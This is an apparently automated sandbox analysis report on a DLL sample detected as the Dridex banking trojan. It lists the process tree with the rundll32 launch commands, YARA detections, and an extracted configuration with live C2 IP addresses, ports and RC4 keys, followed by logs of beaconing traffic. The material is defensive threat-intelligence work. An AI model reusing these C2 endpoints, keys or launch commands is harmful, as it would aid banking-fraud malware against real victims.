Play interactive tour

Edit tour

Windows Analysis Report SecuriteInfo.com.Variant.Razy.980776.8232.dll

Overview

General Information

Sample Name:	SecuriteInfo.com.Variant.Razy.980776.8232.dll
Analysis ID:	510689
MD5:	6df0687582c592e9860683a68858e082
SHA1:	53780def0699c055381746ce4ecebef8f17fd12d
SHA256:	90877ec621cc53fc31e693362e3b335a429aecc77abdbfd8b7d5d7493478f36d
Tags:	dll
Infos:
Most interesting Screenshot:

Detection

Dridex

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Dridex unpacked file

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

Found detection on Joe Sandbox Cloud Basic with higher score

Detected Dridex e-Banking trojan

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Queries the installation date of Windows

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Contains functionality to query network adapater information

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 4248 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)

cmd.exe (PID: 2248 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6340 cmdline: rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 5016 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Bluewing MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6332 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Earth MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6352 cmdline: rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Variant.Razy.980776.8232.dll,Masterjust MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: Dridex

{"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.429863191.0000000003410000.00000040.00000001.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000003.404224619.0000000004740000.00000040.00000010.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000003.00000002.690890687.000000006E9F1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000002.690396403.000000006E9F1000.00000020.00020000.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000004.00000003.420461174.0000000004120000.00000040.00000001.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000002.00000003.396279024.0000000004910000.00000040.00000001.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
00000000.00000003.431718268.00000000009E0000.00000040.00000001.sdmp	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 2 entries

Unpacked PEs

Source	Rule	Description	Author
3.3.rundll32.exe.475db55.0.raw.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.3.rundll32.exe.475db55.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.3.rundll32.exe.492db55.0.raw.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
5.3.rundll32.exe.342db55.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.3.rundll32.exe.413db55.0.raw.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.3.loaddll32.exe.9fdb55.0.raw.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
4.3.rundll32.exe.413db55.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
2.3.rundll32.exe.492db55.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.3.loaddll32.exe.9fdb55.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
0.2.loaddll32.exe.6e9f0000.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
5.3.rundll32.exe.342db55.0.raw.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
3.2.rundll32.exe.6e9f0000.0.unpack	JoeSecurity_Dridex_1	Yara detected Dridex unpacked file	Joe Security
Click to see the 7 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 3.2.rundll32.exe.6e9f0000.0.unpack

Malware Configuration Extractor: Dridex {"Version": 10444, "C2 list": ["192.46.210.220:443", "143.244.140.214:808", "45.77.0.96:6891", "185.56.219.47:8116"], "RC4 keys": ["9fRysqcdPgZffBlroqJaZHyCvLvD6BUV", "syF7NqCylLS878kcIy9w5XeI8w6uMrqVwowz4h3uWHHlWsr5ELTiXic3wgqbllkcZyNGwPGihI"]}

Multi AV Scanner detection for submitted file

Show sources

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

ReversingLabs: Detection: 18%

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: unknown	HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49744 version: TLS 1.2

Source: SecuriteInfo.com.Variant.Razy.980776.8232.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\Gun\208-town\521\exa\botto\party.pdb source: loaddll32.exe, 00000000.00000002.690574263.000000006EAB7000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.691096574.000000006EAB7000.00000002.00020000.sdmp, SecuriteInfo.com.Variant.Razy.980776.8232.dll

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA1CEF8 FindFirstFileExW,

0_2_6EA1CEF8

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 45.77.0.96 235	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.56.219.47 180	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.46.210.220 187	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 143.244.140.214 40	Jump to behavior

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: 192.46.210.220:443
Source: Malware configuration extractor	IPs: 143.244.140.214:808
Source: Malware configuration extractor	IPs: 45.77.0.96:6891
Source: Malware configuration extractor	IPs: 185.56.219.47:8116

Source: Joe Sandbox View	ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View	ASN Name: KELIWEBIT KELIWEBIT

Source: Joe Sandbox View

JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4802Connection: CloseCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 45.77.0.96 45.77.0.96
Source: Joe Sandbox View	IP Address: 185.56.219.47 185.56.219.47

Source: global traffic	TCP traffic: 192.168.2.3:49745 -> 143.244.140.214:808
Source: global traffic	TCP traffic: 192.168.2.3:49748 -> 45.77.0.96:6891
Source: global traffic	TCP traffic: 192.168.2.3:49750 -> 185.56.219.47:8116

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:10 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:12 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:21 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:22 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:28 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:29 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:36 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:37 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:44 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:45 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:52 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:11:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:12:00 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:12:09 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:12:16 GMTContent-Type: text/plain; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 03:12:24 GMTContent-Type: text/plain; charset=utf-8Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 143.244.140.214
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 45.77.0.96
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47
Source: unknown	TCP traffic detected without corresponding DNS query: 185.56.219.47

Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.690375377.0000000002F60000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.3.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: loaddll32.exe, 00000000.00000003.563593432.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://14.77.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214/
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/Q#
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/hy
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/l
Source: loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/l?
Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/la
Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/oft
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://143.244.140.214:808/q
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47/
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.680691305.0000000002F6D000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/0
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/N
Source: rundll32.exe, 00000003.00000003.680691305.0000000002F6D000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/dv
Source: loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/fW
Source: loaddll32.exe, 00000000.00000003.462263005.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/ion
Source: loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://185.56.219.47:8116/soft
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.689702912.0000000000958000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000002.690791416.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/
Source: loaddll32.exe, 00000000.00000003.544483266.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/#
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/4
Source: loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/7.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.462263005.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/:
Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/A
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/H
Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/N
Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/S
Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/X
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/a
Source: loaddll32.exe, 00000000.00000003.528593129.000000000095A000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/aenh.dll
Source: loaddll32.exe, 00000000.00000002.689702912.0000000000958000.00000004.00000020.sdmp	String found in binary or memory: https://192.46.210.220/e
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/k
Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://192.46.210.220/w
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.452876324.0000000002F60000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/.0.96:6891/m
Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/14
Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/6
Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/F
Source: loaddll32.exe, 00000000.00000003.462293153.0000000000998000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/I
Source: loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/Microsoft
Source: loaddll32.exe, 00000000.00000003.588479103.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/N
Source: loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/der
Source: loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/der.
Source: loaddll32.exe, 00000000.00000003.502791575.000000000095F000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/der6
Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/derF
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.577280807.000000000095A000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.690791416.000000000516B000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/graphy
Source: loaddll32.exe, 00000000.00000003.528593129.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/m
Source: loaddll32.exe, 00000000.00000003.454214187.0000000000960000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/n
Source: loaddll32.exe, 00000000.00000003.550818724.000000000095A000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/r
Source: loaddll32.exe, 00000000.00000003.507832942.000000000095E000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/s
Source: rundll32.exe, 00000003.00000003.452876324.0000000002F60000.00000004.00000001.sdmp	String found in binary or memory: https://45.77.0.96:6891/tv
Source: loaddll32.exe, 00000000.00000003.588542821.0000000000997000.00000004.00000001.sdmp	String found in binary or memory: https://45192.46.210.220/

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 192.46.210.220Content-Length: 4814Connection: CloseCache-Control: no-cache

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EA239F9 InternetReadFile,

0_2_6EA239F9

Source: unknown	HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.3:49744 version: TLS 1.2

E-Banking Fraud:

Yara detected Dridex unpacked file

Show sources

Source: Yara match	File source: 3.3.rundll32.exe.475db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.rundll32.exe.475db55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.492db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.342db55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.413db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.9fdb55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.413db55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.3.rundll32.exe.492db55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.loaddll32.exe.9fdb55.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.loaddll32.exe.6e9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.342db55.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.6e9f0000.0.unpack, type: UNPACKEDPE
